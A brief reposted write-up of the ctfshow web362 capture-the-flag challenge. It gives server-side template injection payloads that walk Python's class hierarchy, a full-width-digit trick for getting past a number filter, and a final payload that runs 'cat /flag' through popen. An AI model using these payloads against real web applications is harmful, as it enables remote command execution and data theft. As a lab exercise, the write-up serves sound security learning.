ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】

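?name={{"".__class__.__bases__[0].__subclasses__()}}
Everything works normally up to this step.
Starting from 12, it stops working.
The digits are the problem; following the writeup, full-width digits are used in place of normal digits to bypass the filter.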

?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
After that, the usual method should work:
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

Copyright notice
This article was written by [m0_62094846]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204231829007951.html